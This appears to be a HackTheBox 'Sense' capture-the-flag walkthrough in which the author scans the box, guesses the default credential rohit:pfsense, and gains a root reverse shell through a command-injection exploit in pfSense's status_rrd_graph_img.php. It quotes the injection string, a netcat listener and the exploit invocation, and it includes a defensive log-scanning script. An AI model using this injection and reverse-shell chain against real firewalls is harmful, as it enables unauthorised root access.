HackTheBox | Sense

In this walkthrough, I demonstrate how I obtained complete ownership of Sense on HackTheBox
In: TJ Null OSCP Practice, OSCP Prep, HackTheBox, Attack, CTF

Nmap Results

# Nmap 7.93 scan initiated Wed Apr  5 16:32:12 2023 as: nmap -Pn -p- --min-rate 10000 -A -oN scan.txt
Nmap scan report for
Host is up (0.014s latency).
Not shown: 65533 filtered tcp ports (no-response)
80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
|_ssl-date: TLS randomness does not represent time
|_http-title: Login
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_http-server-header: lighttpd/1.4.35
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), FreeBSD 8.X (85%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:freebsd:freebsd:8.1 cpe:/o:openbsd:openbsd:4.0
Aggressive OS guesses: Comau C4G robot control unit (92%), FreeBSD 8.1 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
1   13.99 ms
2   14.08 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr  5 16:32:47 2023 -- 1 IP address (1 host up) scanned in 36.66 seconds

Service Enumeration

Port 80 redirects to TCP/443, which serves a pfSense login page.
The default credential on pfSense installations is admin:pfsense, which did not work for me in this case.

pfSense public exploits, target version unknown

Googling lighttpd 1.4.35 pfsense brought up this Redmine issue.

Bug #5509: lighttpd regression causing config sync failures in some circumstances - pfSense - pfSense bugtracker

Fairly confident this is 2.2.4.

Gobuster Enumeration

gobuster dir -k -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,txt -r -t 100 -o gobuster-443.txt

/index.html           (Status: 200) [Size: 329]
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/stats.php            (Status: 200) [Size: 6690]
/edit.php             (Status: 200) [Size: 6689]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/changelog.txt        (Status: 200) [Size: 271]
/exec.php             (Status: 200) [Size: 6689]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 200) [Size: 7492]
/wizard.php           (Status: 200) [Size: 6691]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 200) [Size: 6113]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/system-users.txt     (Status: 200) [Size: 106]
/services_dyndns.php  (Status: 200) [Size: 6700]

Looks like we found a username, Rohit, in system-users.txt. Unfortunately, the changelog doesn't disclose a version number, but it does confirm the existence of an unpatched vulnerability. I'm not certain whether "company defaults" refers to the firewall's default password, so we'll give it a shot:

  1. Rohit:pfsense — Nope
  2. rohit:pfsense — 🎉

Looks like we're in!

Looks like I was way off on my version guess.

More Enumeration

I know my way pretty well around pfSense, since I've run it in VMs and on hardware. The web console has a command prompt built into it, but it looks like some of the menus have been disabled for our user.

Based on the version of pfSense on the target, this looks like an excellent candidate for command execution. Let's go through the exploit to understand it further.

searchsploit -m 43560
cat 43560.py

"/status_rrd_graph_img.php?database=queues;"+"printf+" + "'" + payload + "'|sh"

Looks like status_rrd_graph_img.php does not sanitize or validate the database parameter, so a command can be injected into it and piped to sh on the underlying host.

This version of pfSense is very outdated and should be patched promptly to mitigate known vulnerabilities. Beyond that, the exploit in question requires authentication, so it could have been prevented if the user accounts had been protected by non-default passwords.
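As an added defender-side illustration (not code from the original post or from pfSense), the following Python shows the allowlist check a hardened status_rrd_graph_img.php would apply to the database parameter, and scans constructed web-server log lines for requests that carry shell metacharacters in that parameter. The log lines, the regexes and the PAYLOAD placeholder are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed lighttpd-style access-log lines (not captured from the box); line 3
# carries the injection shape quoted from 43560.py, with the payload replaced by PAYLOAD.
SAMPLE_LOG = """\
10.10.14.2 - rohit [05/Apr/2023:16:40:01 +0000] "GET /status_rrd_graph_img.php?database=queues HTTP/1.1" 200 1204
10.10.14.2 - rohit [05/Apr/2023:16:40:05 +0000] "GET /status_rrd_graph_img.php?database=system-processor.rrd&graph=8hour HTTP/1.1" 200 3381
10.10.14.2 - rohit [05/Apr/2023:16:41:12 +0000] "GET /status_rrd_graph_img.php?database=queues;printf+'PAYLOAD'|sh HTTP/1.1" 200 0
10.10.14.2 - rohit [05/Apr/2023:16:41:30 +0000] "GET /index.php HTTP/1.1" 200 6690
"""

# Assumed allowlist: an RRD database name is only letters, digits, '_', '.', '-'.
SAFE_DATABASE = re.compile(r"[A-Za-z0-9_.-]+")
# Characters that let a value escape into a shell command line.
SHELL_META = re.compile(r"[;|&`$()<>\n]")
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

def is_safe_database(value: str) -> bool:
    """Allowlist check a hardened status_rrd_graph_img.php would apply before any shell use."""
    return SAFE_DATABASE.fullmatch(value) is not None

def query_params(query: str):
    """Split on '&' only and decode '+'/%XX escapes, so a ';' stays inside its value."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        yield unquote_plus(key), unquote_plus(value)

def find_injection_attempts(log_text: str) -> list:
    """Return (line_no, decoded database value) for requests to
    status_rrd_graph_img.php whose database parameter fails the allowlist
    and contains shell metacharacters."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != "/status_rrd_graph_img.php":
            continue
        for key, value in query_params(url.query):
            if key == "database" and not is_safe_database(value) and SHELL_META.search(value):
                hits.append((line_no, value))
    return hits

if __name__ == "__main__":
    for line_no, value in find_injection_attempts(SAMPLE_LOG):
        print(f"line {line_no}: suspicious database={value!r}")
```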

sudo rlwrap nc -lnvp 443

Start a TCP listener

python3 --rhost --lhost --lport 443 --username rohit --password pfsense

Run the exploit

Privilege Escalation

No separate privilege escalation is needed: the injected command is executed by a privileged service, so the reverse shell comes back as root.